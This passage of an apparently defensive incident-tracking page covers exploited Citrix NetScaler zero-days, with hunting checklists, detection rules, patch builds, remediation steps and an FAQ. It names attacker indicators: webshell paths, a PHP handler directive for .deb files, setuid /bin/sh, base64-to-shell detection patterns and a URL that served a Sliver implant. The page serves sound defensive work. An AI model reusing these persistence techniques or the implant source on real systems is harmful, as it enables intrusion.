Beazley's checklist includes /var/cron/tabs/, the root and nsroot crontabs, /nsconfig/rc.netscaler and /nsconfig/nsafter.sh, and it notes that attackers have used cron jobs to remove forensic artefacts. Beazley lists nsafter.sh as a place to review; it does not report an attacker using it.

Source: Beazley BSL-A1216

CERT-EU hunting patterns Passive

  • base64 strings in the User-Agent header that start with INDEX:.
  • PPE missed too many heartbeats entries in authentication logs.
  • Check that httpd.conf is intact, for example by looking for the AliasMatch in the IoC table.

Source: CERT-EU writeup

Sygnia: where to look Passive

These are normal appliance files and logs, not IoCs. Sygnia lists them as places to review.

  • Web server config: /etc/httpd.conf, /nsconfig/httpd.conf, /flash/nsconfig/httpd.conf and /nsconfig/https.conf. Look for unauthorized AddHandler, SetHandler, Alias, AliasMatch, php_flag or php_value directives.
  • Startup persistence: /flash/nsconfig/rc.netscaler and other startup locations.
  • Shell history and notices: /var/log/notice.log*, /var/log/sh.log* and /var/log/bash.log*, including attempts to delete /var/core artifacts.
  • Web errors: /var/log/httperror* for unexpected files in web-accessible directories. A missing-file request is not the same as a file being created or run.
  • Permissions: /bin/sh with mode 6555, or any unexplained setuid or setgid change.

Execution may be delayed, so Sygnia advises correlating suspicious requests with host and network activity for at least 24 hours.

Source: Sygnia advisory

CISA SIGMA rule TLP:CLEAR

CISA's Code & Media Analysis team published a SIGMA detection rule (added to the CISA alert on October 2) covering known exploitation and post-exploitation activity for CVE-2026-88771 and CVE-2026-88772. It hunts the pitboss PPE unexpectedly died and PPE missed too many heartbeats messages, INDEX: base64 user-agent strings, /nf/auth/doAuthentication.do requests combined with the crash messages, the .ctxs.receiver webshell path combined with the nsgclient18.deb droppers or ns_monuploadd_err.pl, and base64-decode piped-to-shell patterns. Rule status is "test"; CISA says it may update the rule as more information becomes available, and recommends converting it with a local Sigma installation.

Source: CISA SIGMA Rules repository; CISA alert, updated Oct 2. Every keyword in the rule was already on this page's IoC table and detection cards; the rule bundles them into SIEM queries.

CIRCL TR-100 Config check

For each CVE, CIRCL gives CLI commands that check whether your appliance's configuration exposes it. Run them on appliances you administer.

Source: CIRCL TR-100

Citrix Console IoC checker Limits per Beaumont Validated

  • Available only through support or under NDA. [64]
  • Incomplete: it does not check for suid on /bin/sh. [67]
  • Citrix's own documentation says the IoC information "might be of limited forensic value and might fail to identify actual compromises", and advises retaining experienced forensic investigators. [6]
  • In the field, the Console scanner has flagged base64 content referencing the .ctxs.receiver webshell, "Certificate digest verification failed" (possibly tampered certificate or key files) and "Binary Fingerprinting detected", according to one practitioner's notes. [107]
  • Citrix also points to Console File Integrity Monitoring for unexpected file changes, and recommends forwarding NetScaler logs to an external SIEM. [4]
  • The bulletin text itself lists no generic IoCs: they come only through the Console scan (version 14.1-73.36 or later, telemetry enabled, started manually) or from Citrix Support. NCSC-NL's 1.0.1 revision says the same. [4][9]
  • Misses earlier semi-successful attempts once logs have rotated. [65]
  • Citrix keeps updating the detection logic, and Console shows when an update is available. Version 4 was released by 1 October (validated independently). If you scanned earlier, scan again. [6]

The missing suid check and the log-rotation gap were validated independently on 29 September. The NDA point has not been verified.

Beaumont also says Some really big orgs are backdoored after patching still. That claim is not independently verified. He has asked national CSIRTs (NCSCs) to publish a detection script. [67]

GTIG/Mandiant artefacts and YARA Passive

Successful CVE-2026-88772 exploitation left two log artefacts:

  • In syslog, an SSL_HANDSHAKE_FAILURE with ClientVersion DTLSv1.0 and Reason "Handshake failure-Internal Error".
  • In /var/log/messages, an NSPPE termination logged by pitboss, the watchdog daemon that restarts crashed processes.

Also look for httpd.conf changes that make the web server treat other file types as PHP, such as AddHandler application/x-httpd-php .deb.

GTIG publishes five YARA rules: G_APT_Backdoorwebshell_WHIPSHOT_1, G_APT_Tunneler_SLAPSHOT_1, G_Hunting_Backdoorwebshell_NetScaler_C2Headers_1, G_Hunting_Config_NetScaler_PHP_1 and G_Hunting_Script_NetScaler_Persistence_1. This page links to them rather than copying them.

Source: GTIG/Mandiant advisory

Nextron THOR Scanner rules

As of 29 September, Nextron has three rules in the THOR Preview channel:

  • LOG_SUSP_EXPL_CVE_2026_88771_Sep26
  • WEBSHELL_CSS_PassThrough_Sep26, which detects the webshell's behaviour, not only its filename
  • EXPL_CVE_2026_88772_POC_Sep26, which detects PoC artefacts, not attacks on an appliance

Nextron also published a YAML filesystem IoC set derived from Citrix's scanner script. It covers 12 of the script's checks, consolidated into four file rules. It leaves out the 22 checks that depend on logs, configuration or runtime state.

Preview-channel rules have not finished manual QA, so expect more false positives than with stable rules. A match is a lead for investigation, not proof of compromise.

Source: Nextron Systems

Community detection rules Rules

  • Elastic: "Potential NetScaler Log Poisoning Command Injection Attempt", an EQL rule on Citrix ADC logs. Merged on 28 September.
  • Sigma pull request #6352: shell metacharacters sent to the NetScaler authentication endpoint. Not yet merged.
  • Corelight: Zeek hunting queries, including a search for the reverse-shell IP in the IoC table.
  • Nuclei pull request #17336: an active injection probe, not a version check. It writes to the target's logs, so run it only on systems you own or administer. Not yet merged.
  • Lupovis suggests two hunts: POST /nf/auth/doAuthentication.do requests whose body contains pitboss PPE unexpectedly died NSPPE, and DNS lookups from a NetScaler ending in instances.httpworkbench.com. [98]

Beazley Security Labs checks Passive

Beazley's BSL-A1216 advisory lists read-only shell checks. It splits them into those to run before patching (the web-server config, /bin/sh permissions and NX-CVE-OK test markers, which a reboot rebuilds) and those that persist across upgrades (hidden files under /var/netscaler/logon). It also recommends comparing /etc/httpd.conf with a clean appliance on the same build.

Source: Beazley Security Labs BSL-A1216

watchTowr Detection Artefact Generators Active tests

These tools send traffic to an appliance. Run them only against systems you own or administer. This page links to the repositories. It does not reproduce their code or payloads.

Beaumont describes the other GitHub "PoCs" he has seen as fake AI slop. That is his characterisation. [71]

Remediation: patching NetScaler ADC and Gateway

In short: check for compromise and preserve evidence first, then upgrade to 14.1-73.37 or 13.1-64.23 or later (FIPS/NDcPP builds below), per Citrix CTX697096 as of 30 September 2026. Patching does not remove an existing backdoor. [1]

Fixed builds (Citrix CTX697096)

Fixed builds as listed in CTX697096
Fixed build, exactly as listed by Citrix
NetScaler ADC/Gateway 14.1-73.37 and later
NetScaler ADC/Gateway 13.1-64.23 and later
NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.279 and later

Source: Citrix CTX697096. Use the bulletin as the authority for which build applies to your deployment.

13.1 upgrades: watchTowr advises running show ns variable first. If it returns any variables, use 13.1-64.24 to avoid a known reboot loop during the upgrade; Citrix lists this as a known issue in 13.1-64.23, not a vulnerability. [94][4] CVE-2026-88778 is fixed by enabling Enhanced ISN Generation, not by the upgrade alone. [21]

Other notes from Citrix: the NetScaler VPX 15.1 Technology Preview is also vulnerable. It is not permitted in production and Citrix says a fix will follow. The Console Security Advisory scan may wrongly flag 13.1-64.23 as vulnerable until the next automatic advisory update, with no need to upgrade Console. samlRejectUnsignedAssertion OFF is no longer supported and is converted to the secure default on upgrade, so make sure your identity provider signs SAML assertions. [4]

Cloudflare WAF: Cloudflare shipped an emergency managed rule on 1 October that blocks the CVE-2026-88771 improper-input-validation pattern. It covers only that CVE, and Cloudflare itself says to apply the latest versions to secure the origin. Treat it as a stopgap for appliances that sit behind Cloudflare, not a substitute for patching or a compromise check. [85]

Secure Private Access: Citrix says Secure Private Access Hybrid deployments that use NetScaler instances are also affected, so those instances need the same upgrade. The bulletin applies only to customer-managed NetScaler ADC and Gateway; Citrix upgrades its own managed cloud services and Citrix-managed Adaptive Authentication. [1]

End-of-life releases: NetScaler ADC and Gateway 12.1 and 13.0 are end of life, receive no fix and are likely vulnerable. Migrate them to a supported release. [23][60]

The bulletin is inconsistent about the last build. Its fixed-builds list says 13.1.37.279, while its affected-versions list says "FIPS and NDcPP BEFORE 13.1-37.279". Truesec and IFIN use 13.1-37.279. The table above keeps Citrix's fixed-builds wording exactly.

After patching

  1. Check for compromise and preserve evidence before you patch. Mandiant's CTO, Charles Carmakal, says customers should examine their systems for compromise *before* upgrading/patching. [95] Unit 42 lists the evidence to capture: [96]
    • a NetScaler VPX instance snapshot
    • logs on remote syslog servers and in NetScaler Console
    • a technical support bundle
    • a packet engine core dump
    Patching and restarting can destroy this evidence. Citrix lists the same items and also says to record the system time, timezone and NTP settings first. [3]
  2. Patch to a fixed build from the table above.
  3. Hunt for compromise. Check for:
    • webshells, including the GreyNoise path and alias above
    • changes to httpd.conf, such as an unexpected AliasMatch
    • unusual permissions on /bin/sh, such as setuid or setgid
    Use the CERT-EU and CIRCL guidance. [27][24][53]
  4. If compromise is suspected or confirmed, Citrix's CTX694799 says to:
    • take the appliance off the network;
    • change every secret stored on it on the systems it talks to (LDAP and RADIUS secrets, OAuth tokens, API keys, SNMP community names) and the passwords of users who signed in through it, and revoke its certificates and private keys;
    • check the servers and systems it connected to, especially authentication servers and management jump hosts;
    • rebuild rather than clean: replace a VPX instance, wipe and reinstall an MPX, upgrade the firmware, then restore a known good configuration backup that pre-dates the compromise;
    • rotate the local passwords and key encryption keys again after the restore, replace the restored certificates, and monitor closely for at least 90 days.
    Citrix says management services should never be exposed to the internet, and to consult legal counsel before rebuilding if law enforcement may become involved. [3]
  5. Assume activity may be weeks old. Beaumont says slow disclosure means attackers have been active for weeks. [65]

Patching closes the vulnerabilities. It does not reverse a compromise that already happened. This page does not give remediation commands or guarantees. Follow Citrix and your national CSIRT.

NetScaler zero-day FAQ

Is there a new NetScaler issue involving SAML?

Citrix published guidance on 2 Oct 2026 for a newly observed, configuration-dependent issue in NetScaler deployments that use SAML authentication on a Gateway or AAA virtual server. It says the issue is independent of CTX697096 and that a security bulletin and product update are planned. No CVE, affected versions or fixed builds were listed yet. Beaumont reports his patched honeypots crashing, which is one researcher's observation. This site covers CVE-2026-88771 and CVE-2026-88772; the SAML issue is not part of CTX697096. [2][74][75]

What is PitScaler?

PitScaler is the name Kevin Beaumont gave on 28 Sep 2026 to the exploitation of Citrix NetScaler ADC and NetScaler Gateway zero-days CVE-2026-88771 and CVE-2026-88772. Citrix disclosed them, with six other CVEs, in bulletin CTX697096 on 27 Sep 2026. [66][1]

Which NetScaler vulnerabilities are exploited?

CVE-2026-88771 (unauthenticated remote command execution in the default configuration, CVSS 4.0 9.5) and CVE-2026-88772 (DTLS memory overflow leading to RCE or DoS, CVSS 4.0 9.5). CISA added both to its KEV catalog on 27 Sep 2026 with a 30 Sep deadline. Kevin Beaumont reports CVE-2026-88773 was chained with the two, but no other source has independently confirmed that. No exploitation is reported for CVE-2026-88774 to CVE-2026-88778. [1][20][63]

Which NetScaler versions fix CVE-2026-88771 and CVE-2026-88772?

Per CTX697096: NetScaler ADC/Gateway 14.1-73.37 and later; 13.1-64.23 and later; ADC 14.1-FIPS 14.1-73.37 FIPS and later; ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.279 and later (the bulletin also writes this build as 13.1-37.279). [1]

Does patching remove a NetScaler backdoor?

No. Patching closes the vulnerabilities but does not remove webshells or configuration changes planted before the update. Check for compromise and preserve evidence (logs, memory, a VM snapshot) before patching, then patch. [64][34][27]

How do I check a NetScaler for compromise?

Look for AddHandler or AliasMatch changes in httpd.conf that make non-PHP files run as PHP; PHP code in VPN script and media directories such as /var/netscaler/gui/vpn/scripts/linux/; a setuid bit on /bin/sh; /tmp/.uxdport and /tmp/.uxdlock (SLAPSHOT); and DTLSv1.0 SSL_HANDSHAKE_FAILURE log entries followed by an NSPPE crash. Beaumont reports that the Citrix checker misses the /bin/sh setuid check, so a clean scan does not clear a host. [34][27][53][67]

When did the exploitation start?

Unit 42 traces version fingerprinting from 21 Aug 2026 (not exploitation) and .deb webshell requests from 4 Sep. eSentire saw CVE-2026-88771 exploited as early as 5 Sep 2026, more than three weeks before disclosure, and Google GTIG and Mandiant report CVE-2026-88772 exploitation since at least early September. Australia's ACSC advises reviewing for compromise since at least 4 Sep 2026. GreyNoise recorded a CVE-2026-88771 attempt on 24 Sep 2026. [48][34][17][53]

Who is behind the attacks?

No vendor has publicly attributed the activity to a named threat actor as of 1 Oct 2026. Mandiant's CTO says advanced and suspected state-sponsored actors are likely behind the initial targeted CVE-2026-88772 intrusions, without naming one, and Kevin Beaumont calls the attackers probably nation-state aligned. Both are assessments, not a confirmed attribution. [43][63][84]

Should I shut down or disconnect my NetScaler?

Before patches existed, many organisations were advised to shut down or disconnect NetScaler appliances: the Dutch central government applied "disconnect unless" from 26 Sep 2026, and Danish agencies including PET, the Armed Forces and the police switched theirs off. Now that fixed builds exist, GTIG/Mandiant recommend upgrading, isolating only appliances with confirmed or suspected compromise, and, if patching is delayed, disabling DTLS or blocking inbound UDP/443 upstream (this mitigates CVE-2026-88772 only, not CVE-2026-88771). [25][99][82][34]

Were CVE-2026-88771 and CVE-2026-88772 exploited as zero-days?

Yes. Citrix confirmed exploitation on unmitigated appliances when it disclosed them on 27 Sep 2026. eSentire saw CVE-2026-88771 exploited from 5 Sep, and GreyNoise recorded an attempt on 24 Sep, before any patch or CVE was public. [1][48][53]

Who found the NetScaler zero-days?

The exploited flaws were found during incident response: BleepingComputer reports Citrix discovered them while investigating incidents at customers, and watchTowr says they were discovered during forensics. The CTX697096 bulletin credits Michael Tucker, Chew Keong Tan and Alex Bernier of the JPMorgan Chase XOR Team, and Maxim Suhanov, without saying which CVE each reported. The Stack reports it understands the JPMorgan team disclosed the vulnerabilities, and says it could not independently confirm a disclosure timeline. [82][51][1][83]

Is PitScaler a live incident feed?

No. PitScaler is an independent historical snapshot, last updated 3 October 2026, 18:31 UTC. Check official advisories such as Citrix CTX697096 and the CISA alert for current status. [1][7]

How many NetScaler appliances are exposed?

Censys counted 42,735 NetScaler hosts on 28 Sep 2026, Unit 42 counted 50,277 potentially vulnerable exposed instances on 27 Sep, and Shadowserver reports more than 20,000 instances exposed and potentially at risk. These are exposure counts, not confirmed compromises. [60][96][97]

References

Bracketed numbers in the text, such as [1], point to the rows below. Every link below is the exact URL from the compiled dataset. IFIN, Truesec, GTIG/Mandiant, Nextron, The Register, Unit 42, the Dutch government letter, two more Beaumont posts, the CVE record, a second BleepingComputer article, the Canada, HKCERT and ACSC advisories, eSentire, Beazley Security Labs, Ingeniøren, DKCERT, NHS England, the CERT-EU advisory, SDxCentral, heise, Dark Reading, Lupovis's own post, and the Censys, Shadowserver, Lupovis, Beazley, Corelight, Elastic, Sigma and Nuclei material were added later, on 29 September. Links marked verification pending did not load in an automated check at build time. The URL has been kept unchanged, not replaced. For all other links, the check only showed that the page loaded, not that its content was reviewed.

Numbered references cited on this page
#SourceTypeURL
1Citrix - CTX697096 security bulletin (Sep 27)Primary official advisorieshttps://support.citrix.com/external/article/CTX697096/citrix-netscaler-adc-and-citrix-netscale.html
2Citrix community blog - Security Update: Guidance for NetScaler SAML Authentication Deployments (Oct 2; new issue, independent of CTX697096)Primary official advisorieshttps://community.citrix.com/techzone-blogs/110_security-updates/security-update-guidance-for-netscaler-saml-authentication-deployments/
3Citrix - CTX694799 Steps to Take if NetScaler ADC is Suspected to be CompromisedPrimary official advisorieshttps://support.citrix.com/external/article/CTX694799/steps-to-take-if-netscaler-adc-is-suspec.html
4Citrix community blog - Security Bulletin for CVE-2026-88771 through CVE-2026-88778 (incl. IoC section; last updated Sep 30) verification pendingPrimary official advisorieshttps://community.citrix.com/techzone-blogs/110_security-updates/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve-2026-88771-through-cve-2026-88778/
5Citrix (CTX-Michael) on r/Citrix, Sep 27 - CRITICAL UPDATE announcementPrimary official advisorieshttps://www.reddit.com/r/Citrix/comments/1wro1yf/critical_update_citrix_netscaler_adc_and_citrix/
6NetScaler Console documentation - Indicators of Compromise detection (incl. Citrix disclaimer on limits)Primary official advisorieshttps://docs.netscaler.com/en-us/netscaler-console-service/instance-advisory/ioc
7CISA alert - Critical zero-day vulnerabilities exploited in Citrix NetScaler ADC/Gateway (Sep 27; updated Oct 2 with a SIGMA detection rule)Primary official advisorieshttps://www.cisa.gov/news-events/alerts/2026/09/27/critical-zero-day-vulnerabilities-exploited-citrix-netscaler-adc-gateway
8CISA Code & Media Analysis SIGMA rule - Citrix NetScaler CVE-2026-88771 and CVE-2026-88772 (TLP:CLEAR, test status; repo may be updated)Primary official advisorieshttps://github.com/cisagov/SIGMA_Rules/blob/develop/CMA_SIGMA_Citrix_CVE_2026_8871.yaml
9NCSC-NL advisory NCSC-2026-0394, version 1.0.1 (Sep 30; probability high, damage high; per-CVE scores and preconditions)Primary official advisorieshttps://advisories.ncsc.nl/2026/ncsc-2026-0394.html
10NCSC-UK - Exploitation of vulnerabilities affecting Citrix NetScaler ADC and GatewayPrimary official advisorieshttps://www.ncsc.gov.uk/news/exploitation-of-vulnerabilities-affecting-citrix-netscaler-adc-and-citrix-netscaler-gateway
11CSA Singapore - AL-2026-129Primary official advisorieshttps://www.csa.gov.sg/alerts-and-advisories/alerts/al-2026-129/
12Canadian Centre for Cyber Security - AL26-024Primary official advisorieshttps://www.cyber.gc.ca/en/alerts-advisories/al26-024-critical-vulnerabilities-affecting-citrix-netscaler-adc-netscaler-gateway-cve-2026-88771-cve-2026-88772
13CERT-FR alert CERTFR-2026-ALE-011 (Sep 28, updated Sep 30)Primary official advisorieshttps://cert.ssi.gouv.fr/alerte/CERTFR-2026-ALE-011/
14CSSF (Luxembourg) communique - Multiple Critical Vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway (Sep 28)Primary official advisorieshttps://www.cssf.lu/en/2026/09/multiple-critical-vulnerabilities-in-citrix-netscaler-adc-and-netscaler-gateway/
15CERT Quebec CERTQC-AVIS-2026-364 (Sep 28, TLP:CLEAR)Primary official advisorieshttps://www.cyber.gouv.qc.ca/avis/certqc-avis-2026-364
16HKCERT - Citrix Products Multiple Vulnerabilities (Sep 28)Primary official advisorieshttps://www.hkcert.org/security-bulletin/citrix-products-multiple-vulnerabilities_20260928
17ACSC (Australia) - Critical vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway (28 Sep; updated 3 Oct with the new SAML issue and confirmed Australian impacts)Primary official advisorieshttps://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/critical-vulnerabilities-in-citrix-netscaler-adc-and-citrix-netscaler-gateway-products
18BSI (Germany) - Citrix NetScaler: Systeme werden ueber ZeroDay-Schwachstellen angegriffen, BITS-H 2026-289305-1132, version 1.1 (Oct 1, TLP:CLEAR)Primary official advisorieshttps://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2026/2026-289305-1032.pdf?__blob=publicationFile&v=4
19NCSC-FI / Traficom (Finland) - Citrix NetScaler vulnerabilities exploited in Finland (1 Oct; intrusions in Finland before the patches)Primary official advisorieshttps://kyberturvallisuuskeskus.fi/en/news/citrix-netscaler-vulnerabilities-exploited-finland
20CISA Known Exploited Vulnerabilities catalog (both CVEs added Sep 27, due Sep 30)Primary official advisorieshttps://www.cisa.gov/known-exploited-vulnerabilities-catalog
21CERT-EU Security Advisory 2026-014 - Critical Vulnerabilities in Citrix NetScaler ADC and Gateway (Sep 27)Primary official advisorieshttps://cert.europa.eu/publications/security-advisories/2026-014/
22DKCERT (CERT for Danish universities and research) - To kritiske NetScaler 0-dage udnyttes aktivt før patch (Sep 29)Primary official advisorieshttps://cert.dk/node/639
23NHS England Digital cyber alert CC-4858 (Sep 28) - Exploitation of zero-day vulnerabilities affecting Citrix NetScalerPrimary official advisorieshttps://digital.nhs.uk/cyber-alerts/2026/cc-4858
24CIRCL TR-100 - per-CVE configuration-check CLI commandsPrimary official advisorieshttps://www.circl.lu/pub/tr-100/
25Dutch government letter to parliament - Kwetsbaarheden Citrix Netscaler (2026D47262, Sep 29)Primary official advisorieshttps://www.tweedekamer.nl/kamerstukken/brieven_regering/detail?id=2026D47262&did=2026D47262
26CVE.org - CVE-2026-88771 record (reserved Sep 10 07:14 UTC by NetScaler; published Sep 27 16:02 UTC)Primary official advisorieshttps://www.cve.org/CVERecord?id=CVE-2026-88771
27CERT-EU - Taking "execute logging" a bit too literally - CVE-2026-88771 (Sep 28)Technical researchhttps://www.cert.europa.eu/blog/taking-execute-logging-a-bit-too-literally-cve-2026-88771
28watchTowr Labs part 1 - Oh Look, the Foot Gun Went Off Again (CVE-2026-88771) (Sep 28)Technical researchhttps://labs.watchtowr.com/oh-look-the-foot-gun-went-off-again-citrix-netscaler-preauth-command-injection-cve-2026-88771/
29watchTowr Detection Artefact Generator - CVE-2026-88771 (GitHub)Technical researchhttps://github.com/watchtowrlabs/watchTowr-vs-Citrix-Netscaler-CVE-2026-88771
30watchTowr Labs part 2 - Here We Go Again (CVE-2026-88772), Sina Kheirkhah (Sep 29)Technical researchhttps://labs.watchtowr.com/here-we-go-again-citrix-netscaler-dtls-preauth-memory-overflow-cve-2026-88772/
31watchTowr Detection Artefact Generator - CVE-2026-88772 (GitHub)Technical researchhttps://github.com/watchtowrlabs/watchTowr-vs-Citrix-Netscaler-CVE-2026-88772
32Martin's Blog (mac.sploit.dk) - "NetScaler Needs More Than Another Patch" (Oct 2 08:00 CEST; opinion/analysis: platform posture, 15.1 Linux Tech Preview, what to demand at renewal)Technical researchhttps://mac.sploit.dk/blog/netscaler-needs-more-than-a-patch/
33Truesec - Multiple Critical Vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway (Sep 28)Technical researchhttps://www.truesec.com/hub/blog/multiple-critical-vulnerabilities-in-citrix-netscaler-adc-and-netscaler-gateway
34Google GTIG / Mandiant - Defending Against Active Exploitation of Citrix NetScaler ADC and Gateway Appliances (Sep 29)Technical researchhttps://cloud.google.com/blog/topics/threat-intelligence/defending-against-active-exploitation-of-citrix-netscaler-adc-and-gateway-appliances
35Nextron Systems (Florian Roth) - New THOR Detection Coverage for CVE-2026-88771 and CVE-2026-88772 (Sep 29)Technical researchhttps://www.nextron-systems.com/2026/09/29/new-thor-detection-coverage-for-citrix-netscaler-cve-2026-88771-and-cve-2026-88772/
36Arctic Wolf - Citrix NetScaler Active Exploitation via CVE-2026-88771 (IoC pack, Sep 30)Technical researchhttps://github.com/rtkwlf/wolf-tools/tree/main/pack_alerts/202609-citrix-netscaler-active-exploitation-cve-2026-88771
37Sygnia - Actively Exploited NetScaler Vulnerabilities (IR-based advisory, Sep 30)Technical researchhttps://www.sygnia.co/threat-reports-and-advisories/actively-exploited-netscaler-vulnerabilities/
38TENEX - What TENEX Observed Inside Active Exploitation of CVE-2026-88771 (Sep 30)Technical researchhttps://tenex.ai/blog/what-tenex-observed-inside-active-exploitation-of-netscaler-zero-day/
39Poppelgaard - NetScaler CTX697096 checker (free read-only script; v1.11 released Oct 2 20:35 UTC, updated Oct 3)Technical researchhttps://github.com/ThomasPoppelgaard/netscaler-ctx697096-checker
40Poppelgaard - CVE-2026-88771 through CVE-2026-88778, what you should know and how to fix (Sep 28, last updated Oct 2)Technical researchhttps://www.poppelgaard.com/cve-2026-88771-through-cve-2026-88778-what-you-should-know-and-how-to-fix-your-netscaler-adc-netscaler-gateway
41External malware analysis report (TLP:CLEAR, 2 Oct) - "Sliver C2 Implant Delivered via Citrix NetScaler Exploitation (CVE-2026-88771)"; independent static analysis, corroborated by Expel IR observation; shared in the w00w00 Slack tlp-amber-citrix-du-jour thread (3 Oct)Technical researchhttps://www.virustotal.com/gui/file/0188b0eba4b01c4fb838df9d1d76c76d7f1dc22897e25161975b606c134c1027
42LevelBlue SpiderLabs (THOR team) - CVE-2026-88771 Observed Exploitation Artifacts and Hunt Indicators (Sep 30; own findings, not independently confirmed)Technical researchhttps://www.levelblue.com/blogs/spiderlabs-blog/citrix-netscaler-cve-2026-88771-observed-exploitation-artifacts-and-hunt-indicators
43Beazley Security advisory (updated Sep 29) - IoC table incl. Lupovis honeypot IPsTechnical researchhttps://beazley.security/alerts-advisories/critical-vulnerability-in-citrix-netscaler-zero-day-prompts-emergency-shutdowns-cve-2026-88771-cve-2026-88772
44Corelight - Hunting Citrix NetScaler zero-days (Zeek queries, Sep 28)Technical researchhttps://corelight.com/blog/hunting-citrix-netscaler-zero-days-corelight
45Elastic detection rule - Potential NetScaler Log Poisoning Command Injection Attempt (merged Sep 28)Technical researchhttps://github.com/elastic/detection-rules/blob/main/rules/network/initial_access_netscaler_log_poisoning_command_injection.toml
46SigmaHQ pull request #6352 - NetScaler auth endpoint shell metacharacters (open, Sep 29)Technical researchhttps://github.com/SigmaHQ/sigma/pull/6352
47Nuclei templates pull request #17336 - CVE-2026-88771 active probe (open, Sep 28)Technical researchhttps://github.com/projectdiscovery/nuclei-templates/pull/17336
48eSentire TRU - Update: ongoing exploitation of NetScaler CVE-2026-88771 / -88772 (first-hand IR, Sep 29)Technical researchhttps://www.esentire.com/security-advisories/update-ongoing-exploitation-of-citrix-netscaler-adc-and-netscaler-gateway-vulnerabilities-cve-2026-88771-cve-2026-88772
49Beazley Security Labs - BSL-A1216 advisory (updates 3-4, Sep 29): consolidated IoCs and hunting commandsTechnical researchhttps://labs.beazley.security/advisories/BSL-A1216
50watchTowr (@watchtowrcyber) - "the watchTowr Labs team has now successfully reproduced this vulnerability" (Oct 3 X post; the vulnerability is not named in the text, understood to be the new SAML issue)Technical researchhttps://x.com/watchtowrcyber/status/2106177591438958751
51watchTowr (@watchtowrcyber) on X, Sep 26 - "Unpatched, 0days. Exploited in-the-wild - discovered during forensics."Technical researchhttps://x.com/watchtowrcyber/status/2103972792043479307
52CyberMaxx - Patches required: Citrix NetScaler vulns exploited in the wild (IoC notes)Technical researchhttps://www.cybermaxx.com/resources/patches-required-citrix-netscaler-vulns-exploited-in-the-wild-cve-2026-88771-and-cve-2026-88772/
53GreyNoise - Swarming Against Citrix 0-Day Exploitation (TLP:CLEAR IoCs, Sep 28)Telemetry and IoCshttps://www.greynoise.io/blog/swarming-against-citrix-0-day-exploitation
54GreyNoise Chronicle - GNTL-20260928 CVE-2026-88771 timelineTelemetry and IoCshttps://www.greynoise.io/chronicle/gntl-20260928-citrix-cve-2026-88771
55GreyNoise Visualizer - IP 149.104.78.141Telemetry and IoCshttps://viz.greynoise.io/ip/149.104.78.141
56GreyNoise tag - Citrix NetScaler CVE-2026-88771 Login Command Injection RCE AttemptTelemetry and IoCshttps://viz.greynoise.io/tag/citrix-netscaler-cve-2026-88771-login-command-injection-rce-attempt
57IFIN - Multiple Citrix Netscaler 0-Days Exploited (tracking thread, from Sep 26; observables "shared without restriction")Telemetry and IoCshttps://ifin.network/t/multiple-citrix-netscaler-0-days-exploited/867
58VirusTotal - Perl file b9b0a438... (first submitted Oct 2 17:29 UTC; 3 of 75 engines by late 2 Oct); a Nextron THOR rule for CVE-2026-88771 and a community comment tie it to NetScaler exploitationTelemetry and IoCshttps://www.virustotal.com/gui/file/b9b0a4380db462c706597bd3e6a08d4d99fcbbf0919d63eb99b488d396c8ce63
59VirusTotal - ELF Sliver implant 0188b0eb... (31 of 75 engines; first submitted 2 Oct 11:49 UTC); served from f.pylrk.cc/HaKi2ufpiQ8AeVTZ/host, TLP:CLEAR malware analysis reportTelemetry and IoCshttps://www.virustotal.com/gui/file/0188b0eba4b01c4fb838df9d1d76c76d7f1dc22897e25161975b606c134c1027
60Censys advisory - NetScaler exposure (42,735 hosts, Sep 28)Telemetry and IoCshttps://censys.com/advisory/cve-2026-10747-2/
61Defused (@DefusedCyber) on X, Sep 29 - decoy hits across multiple CVE-2026-88771 pathsTelemetry and IoCshttps://x.com/DefusedCyber/status/2104888497693708505
62Lupovis (@LupovisDefence) on X, Sep 28 - decoys catch CVE-2026-88771 exploitation hours after the PoCTelemetry and IoCshttps://x.com/lupovisdefence/status/2104595071362326680
63Beaumont, Sep 27 - chained CVEs, webshells all September, "Probably nation state aligned"Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117343729453093307
64Beaumont, Sep 27 - patches live; detection script behind NDA; patching does not remove backdoorsKevin Beaumonthttps://cyberplace.social/@GossiTheDog/117343821114841048
65Beaumont, Sep 27 - Console check misses attempts when logs have rotatedKevin Beaumonthttps://cyberplace.social/@GossiTheDog/117345540231975640
66Beaumont, Sep 28 22:49 UTC - names "PitScaler", >100 victim orgs (his claim)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117351107654208046
67Beaumont, Sep 28 23:02 UTC - Citrix checker incomplete (suid /bin/sh)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117351155381900219
68Beaumont, Sep 29 04:39 UTC - mass exploitation, <10% patched (his claim)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117352481501981552
69Beaumont, Sep 29 06:18 UTC - public message to the NSA (his unverified claim)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117352869498139711
70Beaumont, Sep 29 16:12 UTC - IR vendors publishing victim-unique webshell namesKevin Beaumonthttps://cyberplace.social/@GossiTheDog/117355208096613386
71Beaumont, Sep 28 15:13 UTC - GitHub "PoCs" for the new Citrix vulns are "fake AI slop"Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117349313638958333
72Beaumont, Sep 29 18:32 UTC - Dutch government shuts down all Citrix NetScalers (relaying @bert_hubert)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117355758746619146
73Beaumont, Oct 1 00:12 UTC - Arctic Wolf IoCs cover follow-up "spray and pray" activity, not the early-September actorKevin Beaumonthttps://cyberplace.social/@GossiTheDog/117362758120876296
74Beaumont, Oct 2 19:01 UTC - patched 13.1 and 14.1 honeypots are crashing; "we may have #PitScaler 2 on our hands" (with two screenshots of an unattributed write-up)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117372857146978531
75Beaumont, Oct 2 20:00 UTC - Citrix has published a blog on the new SAML issue (edited 20:15 UTC: "pitboss will execute" softened to "something will execute")Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117373090409884785
